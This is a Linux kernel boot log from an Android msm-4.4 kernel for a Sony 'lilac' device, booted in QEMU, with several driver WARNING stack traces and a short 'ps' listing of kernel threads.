[ 0.000000] RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=2.
[ 0.000000] RCU kthread priority: 1.
[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS:64 nr_irqs:64 0
[ 0.000000] GICv2m: Node v2m: range[0x8020000:0x8020fff], SPI[80:144]
[ 0.000000] Offload RCU callbacks from all CPUs
[ 0.000000] Offload RCU callbacks from CPUs: 0-1.
[ 0.000000] Architected cp15 timer(s) running at 62.50MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x1cd42e208c, max_idle_ns: 881590405314 ns
[ 0.000129] sched_clock: 56 bits at 62MHz, resolution 16ns, wraps every 4398046511096ns
[ 0.000754] clocksource: Switched to clocksource arch_sys_counter
[ 0.002862] Calibrating delay loop (skipped), value calculated using timer frequency.. 125.00 BogoMIPS (lpj=625000)
[ 0.003047] pid_max: default: 32768 minimum: 301
[ 0.003929] Security Framework initialized
[ 0.004069] SELinux: Initializing.
[ 0.004522] SELinux: Starting in permissive mode
[ 0.004966] Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.005017] Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.023663] Initializing cgroup subsys memory
[ 0.024136] Initializing cgroup subsys freezer
[ 0.024256] Initializing cgroup subsys debug
[ 0.038338] /cpus/[email protected]: Unknown CPU type
[ 0.038415] /cpus/[email protected]: Unknown CPU type
[ 0.038571] CPU0: update cpu_capacity 1024
[ 0.039453] ASID allocator initialised with 65536 entries
[ 0.078493] mem dump base table DT node does not exist
[ 0.078665] couldn't find /soc/[email protected] node
[ 0.090148] CPU1: update cpu_capacity 1024
[ 0.090682] CPU1: Booted secondary processor [411fd070]
[ 0.095452] Brought up 2 CPUs
[ 0.095541] SMP: Total of 2 processors activated.
[ 0.095833] CPU: All CPU(s) started at EL1
[ 0.096572] alternatives: patching kernel code
[ 0.323842] CPU1: update max cpu_capacity 1024
[ 0.341084] CPU1: update max cpu_capacity 1024
[ 0.351666] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.351818] futex hash table entries: 512 (order: 3, 32768 bytes)
[ 0.357620] pinctrl core: initialized pinctrl subsystem
[ 0.360215] debug region node not found
[ 0.372552] NET: Registered protocol family 16
[ 0.376688] schedtune: init normalization constants...
[ 0.376756] schedtune: disabled!
[ 0.401557] cpuidle: using governor ladder
[ 0.421111] cpuidle: using governor menu
[ 0.441126] cpuidle: using governor qcom
[ 0.441993] vdso: 2 pages (1 code @ ffffff8009206000, 1 data @ ffffff800a604000)
[ 0.447772] DMA: preallocated 256 KiB pool for atomic allocations
[ 0.470943] exit: IPA_USB init success!
[ 0.499315] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501005] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501372] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.603967] ACPI: Interpreter disabled.
[ 0.604525] socinfo_init: Can't find SMEM_HW_SW_BUILD_ID; falling back on dummy values.
[ 0.605154] Unknown SOC ID!
[ 0.605447] ------------[ cut here ]------------
[ 0.605487] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/soc/qcom/socinfo.c:1622
[ 0.605547] Modules linked in:
[ 0.605652]
[ 0.605853] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.4.74-perf+ #1
[ 0.605889] Hardware name: linux,dummy-virt (DT)
[ 0.605991] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 0.606070] PC is at socinfo_init+0x118/0x7a4
[ 0.606123] LR is at socinfo_init+0x118/0x7a4
[ 0.606153] pc : [<ffffff8009c36b98>] lr : [<ffffff8009c36b98>] pstate: 60400045
[ 0.606177] sp : ffffffc0784b7c80
[ 0.606216] x29: ffffffc0784b7cf0 x28: ffffff8009c81a00
[ 0.606279] x27: ffffff8009c73590 x26: ffffff8009c73570
[ 0.606311] x25: ffffff8009c004b4 x24: ffffff800a9f82f0
[ 0.606341] x23: 0000000000000000 x22: 0000000000000001
[ 0.606371] x21: ffffff800a606000 x20: ffffff800a9f8000
[ 0.606401] x19: ffffff800927a000 x18: 0000000000040000
[ 0.606431] x17: 0000000000003a7f x16: 0000000000000002
[ 0.606461] x15: 0000000000007fff x14: 7564206e6f206b63
[ 0.606491] x13: ffffffffffff0000 x12: 0000000000000028
[ 0.606521] x11: 0000000000000006 x10: ffffff800a89e000
[ 0.606570] x9 : 0000000000000057 x8 : 0000000000000000
[ 0.606601] x7 : 0000000000000000 x6 : ffffff800a89f14e
[ 0.606631] x5 : 0000000000000000 x4 : 0000000000000000
[ 0.606660] x3 : 0000000000000000 x2 : ffffffc0784b4000
[ 0.606689] x1 : 0000000000000000 x0 : 000000000000000f
[ 0.606765]
[ 0.606765] PC: 0xffffff8009c36b58:
[ 0.606801] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.607340] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.607704] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.608063] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.608465]
[ 0.608465] LR: 0xffffff8009c36b58:
[ 0.608495] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.608880] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.609281] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.609640] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.610033]
[ 0.610033] SP: 0xffffffc0784b7c40:
[ 0.610062] 7c40 09c36b98 ffffff80 784b7c80 ffffffc0 09c36b98 ffffff80 60400045 00000000
[ 0.610464] 7c60 ffffffff 00000000 00000000 00000000 ffffffff ffffffff 6c6c7443 6e721f78
[ 0.610948] 7c80 784b7c90 ffffffc0 ff0a0005 ffffffff 784b7d10 ffffffc0 083ad368 ffffff80
[ 0.611330] 7ca0 0000020f 00000000 0a89b000 ffffff80 09aac8b8 ffffff80 09c36a80 ffffff80
[ 0.611725]
[ 0.611845] ---[ end trace cf17d4d9cad0286c ]---
[ 0.611997] Call trace:
[ 0.612231] Exception stack(0xffffffc0784b7ab0 to 0xffffffc0784b7be0)
[ 0.612455] 7aa0: ffffff800927a000 0000008000000000
[ 0.612613] 7ac0: 0000000042b66000 ffffff8009c36b98 ffffff80097286c0 ffffff800a626f48
[ 0.612730] 7ae0: 0000000100000000 ffffff800a89f130 ffffffc0784b7b00 ffffff8008110ce0
[ 0.612845] 7b00: ffffffc0784b7ba0 ffffff800811104c ffffff8008111014 ffffff800a9f8000
[ 0.612960] 7b20: ffffff800a606000 0000000000000001 0000000000000000 ffffff800a9f82f0
[ 0.613074] 7b40: ffffff8009c004b4 ffffff8009c73570 000000000000000f 0000000000000000
[ 0.613187] 7b60: ffffffc0784b4000 0000000000000000 0000000000000000 0000000000000000
[ 0.613304] 7b80: ffffff800a89f14e 0000000000000000 0000000000000000 0000000000000057
[ 0.613418] 7ba0: ffffff800a89e000 0000000000000006 0000000000000028 ffffffffffff0000
[ 0.613534] 7bc0: 7564206e6f206b63 0000000000007fff 0000000000000002 0000000000003a7f
[ 0.613661] [<ffffff8009c36b98>] socinfo_init+0x118/0x7a4
[ 0.613719] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 0.613771] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 0.613810] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 0.613840] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 0.614477] can't find qcom,msm-imem node
[ 0.614555] socinfo_print: v0.1, id=0, ver=0.1
[ 0.614876] msm_bus_fabric_init_driver
[ 0.617203] vgaarb: loaded
[ 0.619519] SCSI subsystem initialized
[ 0.621504] usbcore: registered new interface driver usbfs
[ 0.621968] usbcore: registered new interface driver hub
[ 0.622562] usbcore: registered new device driver usb
[ 0.623818] media: Linux media interface: v0.10
[ 0.624062] Linux video capture interface: v2.00
[ 0.636355] dev-cpufreq: No tables parsed from DT.
[ 0.637869] Advanced Linux Sound Architecture Driver Initialized.
[ 0.646543] Bluetooth: ffffffc0784b7cf0
[ 0.646800] NET: Registered protocol family 31
[ 0.646850] Bluetooth: ffffffc0784b7cf0
[ 0.647078] Bluetooth: ffffffc0784b7cd0Bluetooth: ffffffc0784b7ca0
[ 0.647570] Bluetooth: ffffffc0784b7cb0<6>[ 0.652956] NetLabel: Initializing
[ 0.653014] NetLabel: domain hash size = 128
[ 0.653038] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.654938] cfg80211: World regulatory domain updated:
[ 0.654992] cfg80211: DFS Master region: unset
[ 0.655037] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[ 0.655125] cfg80211: (2402000 KHz - 2472000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655163] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655188] cfg80211: (5170000 KHz - 5250000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655234] cfg80211: (5250000 KHz - 5330000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655260] cfg80211: (5490000 KHz - 5730000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655284] cfg80211: (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 1400 mBm), (N/A)
[ 0.656154] NetLabel: unlabeled traffic allowed by default
[ 0.656738] pcie:pcie_init.
[ 0.662722] clocksource: Switched to clocksource arch_sys_counter
[ 0.879216] pnp: PnP ACPI: disabled
[ 0.883774] NET: Registered protocol family 2
[ 0.891608] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.892033] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
[ 0.892514] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.893122] UDP hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.893331] UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.895278] NET: Registered protocol family 1
[ 0.895829] PCI: CLS 0 bytes, default 64
[ 0.907093] Trying to unpack rootfs image as initramfs...
[ 1.813394] Freeing initrd memory: 10856K (ffffffc008000000 - ffffffc008a9a000)
[ 1.839873] audit: initializing netlink subsys (disabled)
[ 1.841323] audit: type=2000 audit(1.830:1): initialized
[ 1.843654] Initialise system trusted keyring
[ 1.845285] vmscan: error setting kswapd cpu affinity mask
[ 1.868530] VFS: Disk quotas dquot_6.6.0
[ 1.869111] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 1.877043] Registering sdcardfs 0.1
[ 1.879381] fuse init (API version 7.23)
[ 1.880925] SELinux: Registering netfilter hooks
[ 1.883759] pfk_ecryptfs [pfk_ecryptfs_init]: PFK ecryptfs inited successfully
[ 1.883827] pfk_ext4 [pfk_ext4_init]: PFK EXT4 inited successfully
[ 1.883940] pfk [pfk_init]: Driver initialized successfully
[ 1.906531] Key type asymmetric registered
[ 1.906667] Asymmetric key parser 'x509' registered
[ 1.907447] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 1.907643] io scheduler noop registered
[ 1.907745] io scheduler deadline registered
[ 1.908491] io scheduler cfq registered (default)
[ 1.914647] mdss_dsi_status_init: DSI status check interval:5000
[ 1.924056] _smem_log_init: no log or log_idx allocated
[ 1.924109] smem_log_initialize: init failed -19
[ 1.928406] spcom [spcom_init]: spcom driver Ver 1.0 23-Nov-2015.
[ 1.930476] audio_notifer_reg_service: service SSR_MODEM is in use
[ 1.935741] pil: failed to find qcom,msm-imem-pil node
[ 1.943836] msm_serial: driver initialized
[ 1.944825] msm_serial_hs module loaded
[ 1.999765] diag: Unable to register MHI read channel for 0, err: -22
[ 2.001287] diag: Unable to initialze diagfwd bridge, err: -12
[ 2.006917] Unable to detect cache hierarchy from DT for CPU 0
[ 2.053950] brd: module loaded
[ 2.078315] loop: module loaded
[ 2.081406] zram: Added device: zram0
[ 2.091074] tof_sensor_init: Initialize i2c driver
[ 2.091234] tof_sensor_init: Added i2c driver rc = 0Initialize TCS3490 driver
[ 2.091447] TCS3490 added i2c driver rc = 0<6>[ 2.097314] SCSI Media Changer driver v0.25
[ 2.098726] Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
[ 2.111375] tun: Universal TUN/TAP device driver, 1.6
[ 2.111422] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
[ 2.111816] sky2: driver version 1.30
[ 2.112935] PPP generic driver version 2.4.2
[ 2.113685] PPP BSD Compression module registered
[ 2.113776] PPP Deflate Compression module registered
[ 2.113968] PPP MPPE Compression module registered
[ 2.114073] NET: Registered protocol family 24
[ 2.121575] usb_host_ext_event has been registered!
[ 2.122073] usbcore: registered new interface driver usb-storage
[ 2.122469] usbcore: registered new interface driver usb_ehset_test
[ 2.125553] msm_sharedmem: sharedmem_register_qmi: qmi init successful
[ 2.126057] diag: failed to find diag_dload imem node
[ 2.128723] mousedev: PS/2 mouse device common for all mice
[ 2.129813] usbcore: registered new interface driver xpad
[ 2.131793] stmvl53l0_init: Enter
[ 2.131865] stmvl53l0_init_cci: Enter
[ 2.132239] stmvl53l0_init_cci: End
[ 2.132288] stmvl53l0_init: End
[ 2.132729] fpc1145_init OK
[ 2.133628] i2c /dev entries driver
[ 2.138308] ------------[ cut here ]------------
[ 2.138340] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.138361] Modules linked in:
[ 2.138390]
[ 2.138527] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.138558] Hardware name: linux,dummy-virt (DT)
[ 2.138601] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.138639] PC is at msm_sd_register+0x198/0x1fc
[ 2.138666] LR is at msm_sensor_init_module+0x114/0x1b8
[ 2.138686] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c47ab0>] pstate: 60400145
[ 2.138701] sp : ffffffc0784b7d20
[ 2.138735] x29: ffffffc0784b7d20 x28: ffffff8009c82838
[ 2.138770] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.138800] x25: ffffff8009c004b4 x24: 0000000000000000
[ 2.138830] x23: ffffff800aa4b530 x22: ffffff800aa4b528
[ 2.138869] x21: ffffff800aa4b000 x20: ffffff800a833000
[ 2.138907] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.138937] x17: 00000000432aff97 x16: 0000000000000001
[ 2.138966] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.138995] x13: 0000000000000030 x12: 0101010101010101
[ 2.139025] x11: ff7f7f7f7f7f7f7f x10: fdff646b74636e6c
[ 2.139054] x9 : 0000000000000000 x8 : ffffffc076698e00
[ 2.139083] x7 : 0000000000000000 x6 : ffffffc076698c28
[ 2.139111] x5 : 0000000000000040 x4 : ffffff800aa4b088
[ 2.139140] x3 : 000000000000000e x2 : 0000000000020006
[ 2.139169] x1 : ffffffc076698c00 x0 : ffffffc076698c28
[ 2.139200]
[ 2.139200] PC: 0xffffff800897d1bc:
[ 2.139222] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.139580] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.139939] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.140339] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.140723]
[ 2.140723] LR: 0xffffff8009c47a70:
[ 2.140753] 7a70 f9006a77 b900be64 9100a260 97b3c52d f94296a1 52a00043 528000c2 91038020
[ 2.141119] 7a90 72a00042 b9005023 528001c3 f9002420 9100a020 b9006023 b9015822 97b4d56e
[ 2.141488] 7ab0 2a0003f3 340001e0 9125a280 9101e000 79404401 36100381 f0ffb482 f0ffe3e1
[ 2.141872] 7ad0 912f2042 91386021 9101e042 52801803 aa0203e4 2a1303e5 979e0bdd 14000012
[ 2.142246]
[ 2.142246] SP: 0xffffffc0784b7ce0:
[ 2.142275] 7ce0 09c47ab0 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.142660] 7d00 764eba80 ffffffc0 09c4799c ffffff80 ffffffff ffffffff 09c47a80 ffffff80
[ 2.143027] 7d20 784b7d50 ffffffc0 09c47ab0 ffffff80 76698c00 ffffffc0 0a833000 ffffff80
[ 2.143401] 7d40 0aa4b000 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.143841]
[ 2.143883] ---[ end trace cf17d4d9cad0286d ]---
[ 2.143920] Call trace:
[ 2.143951] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.144022] 7b40: ffffff800aa4b000 0000008000000000
[ 2.144134] 7b60: 0000000042b66000 ffffff800897d1fc ffffff8031303531 cb88537fdc8ba64a
[ 2.144253] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.144366] 7ba0: ffffff800923e648 0000000000000800 0000000000000000 ffffffc0764eba80
[ 2.144480] 7bc0: ffffff800a7f1000 ffffffc0764f0b00 ffffffc0784b7c10 ffffff80083aa208
[ 2.144593] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c28 ffffffc076698c00
[ 2.144707] 7c00: 0000000000020006 000000000000000e ffffff800aa4b088 0000000000000040
[ 2.144821] 7c20: ffffffc076698c28 0000000000000000 ffffffc076698e00 0000000000000000
[ 2.144934] 7c40: fdff646b74636e6c ff7f7f7f7f7f7f7f 0101010101010101 0000000000000030
[ 2.145057] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.145115] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.145153] [<ffffff8009c47ab0>] msm_sensor_init_module+0x114/0x1b8
[ 2.145189] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.145225] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.145262] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.145291] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.146752] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2326
[ 2.147185] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (1) 2326
[ 2.147237] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2353
[ 2.150963] ------------[ cut here ]------------
[ 2.150994] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.151014] Modules linked in:
[ 2.151040]
[ 2.151073] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.151093] Hardware name: linux,dummy-virt (DT)
[ 2.151115] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.151147] PC is at msm_sd_register+0x198/0x1fc
[ 2.151173] LR is at msm_buf_mngr_init+0x114/0x200
[ 2.151192] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c484e8>] pstate: 60400145
[ 2.151208] sp : ffffffc0784b7d20
[ 2.151224] x29: ffffffc0784b7d20 x28: ffffff8009c82898
[ 2.151257] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.151286] x25: ffffff8009c004b4 x24: ffffff800aa6d000
[ 2.151316] x23: ffffff80092e0458 x22: ffffff800aa6d000
[ 2.151345] x21: ffffff800aa6d700 x20: ffffffc076698c00
[ 2.151374] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.151403] x17: 00000000432aff97 x16: 0000000000000001
[ 2.151432] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.151461] x13: 0000000000000008 x12: 0101010101010101
[ 2.151490] x11: ffffff800894aa7c x10: ffffff800894b560
[ 2.151519] x9 : 0000000000000000 x8 : 0000000000000000
[ 2.151547] x7 : 0000000000000000 x6 : ffffffc076698c20
[ 2.151583] x5 : ffffff80089f1e44 x4 : ffffff800aa4b088
[ 2.151613] x3 : 000000000000000d x2 : 0000000000040000
[ 2.151649] x1 : ffffffc076698c00 x0 : ffffffc076698c20
[ 2.151680]
[ 2.151680] PC: 0xffffff800897d1bc:
[ 2.151702] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.152054] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.152404] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.152769] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.153124]
[ 2.153124] LR: 0xffffff8009c484a8:
[ 2.153152] 84a8 f9008294 91288084 f90012a5 f90016a4 97b3c29e f9437f01 910322e2 52a00040
[ 2.153499] 84c8 528001a3 b9004820 91008020 f9006422 52a00082 b9005823 b9015022 97b4d2e0
[ 2.153848] 84e8 2a0003f4 34000140 9101c2e1 90ffe460 910ca000 52806be2 aa0103e3 2a1403e4
[ 2.154198] 8508 97951e9d 2a1403e0 1400002c f9437f02 b1008040 f9408841 f9003c35 54000100
[ 2.154553]
[ 2.154553] SP: 0xffffffc0784b7ce0:
[ 2.154580] 7ce0 09c484e8 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.154922] 7d00 764eba80 ffffffc0 09c483d4 ffffff80 ffffffff ffffffff 09c484bc ffffff80
[ 2.155277] 7d20 784b7d50 ffffffc0 09c484e8 ffffff80 092e0000 ffffff80 76698c00 ffffffc0
[ 2.155647] 7d40 0aa6d700 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.156069]
[ 2.156095] ---[ end trace cf17d4d9cad0286e ]---
[ 2.156117] Call trace:
[ 2.156143] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.156209] 7b40: ffffff800aa4b000 0000008000000000
[ 2.156324] 7b60: 0000000042b66000 ffffff800897d1fc 00000000ffffffff cb88537fdc8ba64a
[ 2.156432] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.156540] 7ba0: ffffff800923e648 ffffff80083a1150 ffffffc0766ef000 0000000000000800
[ 2.156649] 7bc0: 0000000000000000 ffffffc0764eba80 ffffffc0784b7c10 ffffff80083aa208
[ 2.156756] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c20 ffffffc076698c00
[ 2.156865] 7c00: 0000000000040000 000000000000000d ffffff800aa4b088 ffffff80089f1e44
[ 2.156972] 7c20: ffffffc076698c20 0000000000000000 0000000000000000 0000000000000000
[ 2.157080] 7c40: ffffff800894b560 ffffff800894aa7c 0101010101010101 0000000000000008
[ 2.157188] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.157240] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.157275] [<ffffff8009c484e8>] msm_buf_mngr_init+0x114/0x200
[ 2.157307] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.157340] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.157373] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.157401] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.157447] CAM-BUFMGR msm_buf_mngr_init:863 msm_buf_mngr_init: msm_sd_register error = -5
[ 2.164607] tsens_controller_is_present: tsens_controller_is_present: TSENS controller not available
[ 2.164687] _tsens_register_thermal: _tsens_register_thermal: TSENS early init not done
[ 2.165473] md: linear personality registered for level -1
[ 2.166120] device-mapper: uevent: version 1.0.3
[ 2.167337] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: [email protected]
[ 2.168421] device-mapper: req-crypt: dm-req-crypt successfully initalized.
[ 2.168421]
[ 2.170719] sdhci: Secure Digital Host Controller Interface driver
[ 2.170754] sdhci: Copyright(c) Pierre Ossman
[ 2.170813] sdhci-pltfm: SDHCI platform and OF driver helper
[ 2.175886] usbcore: registered new interface driver usbhid
[ 2.175928] usbhid: USB HID core driver
[ 2.176592] ashmem: initialized
[ 2.192929] hw perfevents: enabled with armv8_pmuv3 PMU driver, 1 counters available
[ 2.203890] usbcore: registered new interface driver snd-usb-audio
[ 2.225873] sony_hweffect_params_init
[ 2.228462] GACT probability NOT on
[ 2.228790] Mirror/redirect action on
[ 2.229052] u32 classifier
[ 2.229080] Actions configured
[ 2.229531] Netfilter messages via NETLINK v0.30.
[ 2.230447] nf_conntrack version 0.5.0 (16384 buckets, 65536 max)
[ 2.234582] ctnetlink v0.93: registering with nfnetlink.
[ 2.240127] xt_time: kernel timezone is -0000
[ 2.243542] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 2.248215] arp_tables: (C) 2002 David S. Miller
[ 2.249607] Initializing XFRM netlink socket
[ 2.252047] NET: Registered protocol family 10
[ 2.262166] mip6: Mobile IPv6
[ 2.262432] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 2.264716] sit: IPv6 over IPv4 tunneling driver
[ 2.267729] NET: Registered protocol family 17
[ 2.268306] NET: Registered protocol family 15
[ 2.268815] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 2.268915] Ebtables v2.0 registered
[ 2.269846] l2tp_core: L2TP core driver, V2.0
[ 2.270120] l2tp_ppp: PPPoL2TP kernel driver, V2.0
[ 2.270188] l2tp_ip: L2TP IP encapsulation support (L2TPv3)
[ 2.270361] l2tp_netlink: L2TP netlink interface
[ 2.270880] l2tp_eth: L2TP ethernet pseudowire support (L2TPv3)
[ 2.270955] l2tp_ip6: L2TP IP encapsulation support for IPv6 (L2TPv3)
[ 2.271666] NET: Registered protocol family 27
[ 2.288350] Registered cp15_barrier emulation handler
[ 2.288510] Registered setend emulation handler
[ 2.291405] registered taskstats version 1
[ 2.291648] Loading compiled-in X.509 certificates
[ 2.302327] Loaded X.509 cert 'Build time autogenerated kernel key: 70cf1635829ba84ab2643804f0666714b694ca11'
[ 2.304493] Loaded X.509 cert 'Android: 7e4333f9bba00adfe0ede979e28ed1920492b40f'
[ 2.543600] Key type encrypted registered
[ 2.545603] modem_restart_late_init: Unable to create smem ramdump device.
[ 2.546929] spss_utils [spss_init]: spss-utils driver Ver 1.2 13-Jan-2017.
[ 2.547854] servloc: init_service_locator: Service Locator not enabled
[ 2.547905] servloc: pd_locator_work: Unable to connect to service locator!, rc = -19
[ 2.548122] audio_notifer_reg_service: service SSR_ADSP is in use
[ 2.558173] RNDIS_IPA module is loaded.
[ 2.560110] hctosys: unable to open rtc device (rtc0)
[ 2.568247] clock_late_init: Removing enables held for handed-off clocks
[ 2.568376] ALSA device list:
[ 2.568423] No soundcards found.
[ 2.569282] Warning: unable to open an initial console.
[ 2.706130] Freeing unused kernel memory: 10240K ...
Here are a few Linux commands from a Linux shell under that kernel in qemu:
Code:
ps
PID USER COMMAND
1 0 init
2 0 [kthreadd]
3 0 [ksoftirqd/0]
4 0 [kworker/0:0]
5 0 [kworker/0:0H]
6 0 [kworker/u4:0]
7 0 [rcu_preempt]
8 0 [rcu_sched]
9 0 [rcu_bh]
10 0 [rcuop/0]
11 0 [rcuos/0]
12 0 [rcuob/0]
13 0 [rcuc/0]
14 0 [rcub/0]
15 0 [migration/0]
16 0 [migration/1]
17 0 [rcuc/1]
18 0 [ksoftirqd/1]
19 0 [kworker/1:0]
20 0 [kworker/1:0H]
21 0 [rcuop/1]
22 0 [rcuos/1]
23 0 [rcuob/1]
24 0 [netns]
25 0 [perf]
26 0 [smd_channel_clo]
27 0 [dsps_smd_trans_]
28 0 [lpass_smd_trans]
29 0 [mpss_smd_trans_]
30 0 [wcnss_smd_trans]
31 0 [rpm_smd_trans_g]
32 0 [ipa_usb_wq]
33 0 [deferwq]
34 0 [kworker/u4:1]
35 0 [writeback]
36 0 [kcompactd0]
37 0 [crypto]
38 0 [bioset]
39 0 [kblockd]
40 0 [md]
41 0 [devfreq_wq]
42 0 [governor_msm_ad]
43 0 [kworker/1:1]
44 0 [cfg80211]
45 0 [kworker/0:1]
71 0 [power_off_alarm]
72 0 [kswapd0]
73 0 [vmstat]
74 0 [fsnotify_mark]
75 0 [ecryptfs-kthrea]
107 0 [glink_ssr_wq]
108 0 [glink_lbsrv]
109 0 [glink_xprt_wq]
110 0 [apr_driver]
111 0 [glink_pkt_wq]
113 0 [diag_real_time_]
114 0 [diag_wq]
